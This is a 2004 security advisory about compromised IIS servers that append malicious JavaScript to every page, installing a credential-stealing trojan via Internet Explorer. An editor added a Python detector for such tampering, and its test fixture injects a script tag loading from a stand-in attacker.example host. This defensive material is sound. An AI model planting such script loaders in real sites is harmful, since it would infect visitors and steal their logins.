IIS Server Compromises
- URL: http://www.secureworks.com/research/threats/iiscompromises
- Date: June 25, 2004
- Author: Joe Stewart
A number of sites are reporting malicious JavaScript code being appended to every page served by IIS. Some in the press are speculating that a new "zero-day" IIS vulnerability is circulating. At this time SecureWorks has seen no evidence of a new vulnerability or worm. We have seen a relatively small number of sites reporting the code, so it is possible the sites were compromised manually, or that the webmaster was infected while browsing with Internet Explorer on the web server itself. There has been no increase in scanning for port 80, and no new exploit code is being picked up by SecureWorks honeypots at this time.
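As an added check, here is a small Python script, not part of the original advisory, that audits HTML responses for the symptom described above: script elements appended after the page's own closing tag, and script sources served from a host other than the site itself. The sample pages, the site URL and the attacker.example hostname are constructed for the demonstration.

```python
"""Flag HTML responses that carry script content appended past the document end.

This is an added example, not code from the SecureWorks advisory. The advisory
reports malicious JavaScript appended to every page served by a compromised IIS
host. Markup appended by the server lands after the page's own closing tag, so a
<script> element that appears after the final </html> (or </body>) is a strong
sign of that kind of tampering. A second check lists script sources hosted
somewhere other than the site itself. The sample pages and hostnames below are
constructed for the demonstration.
"""
import re
from urllib.parse import urlparse

# Match a complete <script ...>...</script> element, including inline bodies.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# Pull the src attribute value out of a script start tag.
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# The document's closing tags; content after the last one is suspect.
CLOSE_RE = re.compile(r"</(?:html|body)\s*>", re.IGNORECASE)


def trailing_scripts(html):
    """Return script elements found after the last </body> or </html> tag."""
    closes = list(CLOSE_RE.finditer(html))
    if not closes:
        return []            # no closing tag at all: nothing to compare against
    tail = html[closes[-1].end():]
    return SCRIPT_RE.findall(tail)


def foreign_script_hosts(html, page_url):
    """Return hostnames of external scripts that do not match the page's host."""
    own_host = (urlparse(page_url).hostname or "").lower()
    hosts = set()
    for tag in SCRIPT_RE.findall(html):
        m = SRC_RE.search(tag)
        if not m:
            continue         # inline script, no src attribute
        host = urlparse(m.group(1)).hostname
        if host and host.lower() != own_host:
            hosts.add(host.lower())
    return sorted(hosts)


def audit_page(html, page_url):
    """Run both checks; a non-empty result in either field deserves a look."""
    return {
        "trailing_scripts": trailing_scripts(html),
        "foreign_script_hosts": foreign_script_hosts(html, page_url),
    }


# Constructed sample responses (hypothetical hostnames).
SITE_URL = "http://www.example-store.test/index.html"
CLEAN_PAGE = (
    '<html><head><title>Store</title>'
    '<script src="/js/menu.js"></script></head>'
    '<body><p>Welcome</p></body></html>\n'
)
# What a page looks like when the server appends a loader for a remote script.
TAMPERED_PAGE = CLEAN_PAGE + '<script src="http://attacker.example/x.js"></script>\n'

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, audit_page(page, SITE_URL))
```

Run it against copies of pages fetched from the server rather than against the files on disk: if trailing_scripts comes back non-empty while the file on disk is clean, something in the server's configuration is appending content to every response, and that is where to look next.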
The main exposure from this attack is to users who visit one of the infected sites with Internet Explorer. The malicious JavaScript silently installs a variant of the Berbew/Webber/Padodor trojan, which can steal eBay, PayPal and webmail account logins when the user visits those sites. Users running Windows XP may also be shown fake pop-ups that try to coerce credit card and PIN numbers from them.
SecureWorks' IDS and IPS platforms have signatures to detect both the trojan activity and the IE exploit, so we will escalate any infections we detect to you. There is currently no patch from Microsoft for the vulnerability in IE; the workaround is to disable Active Scripting. Ordinarily Active Scripting would be left enabled for trusted sites only, but since the compromise could come from a trusted site, disabling Active Scripting in all external zones is the only completely safe action. This should be weighed against the total risk of the compromise, which is fairly low: the media coverage will probably force the trojan download site offline shortly, and most desktop antivirus products should be able to detect and remove the threat with updated virus definitions. Manual removal of the trojan is also fairly trivial: two registry edits and a reboot.
More information concerning remediation is available from Microsoft at: http://www.microsoft.com/security/incident/download_ject.mspx
More detailed information is available through the SecureWorks Threat Intelligence release. This advisory is brought to you by SecureWorks' research team. Threat Intelligence provides security teams with vulnerability alerts and early warnings to emerging threats tailored to your environment.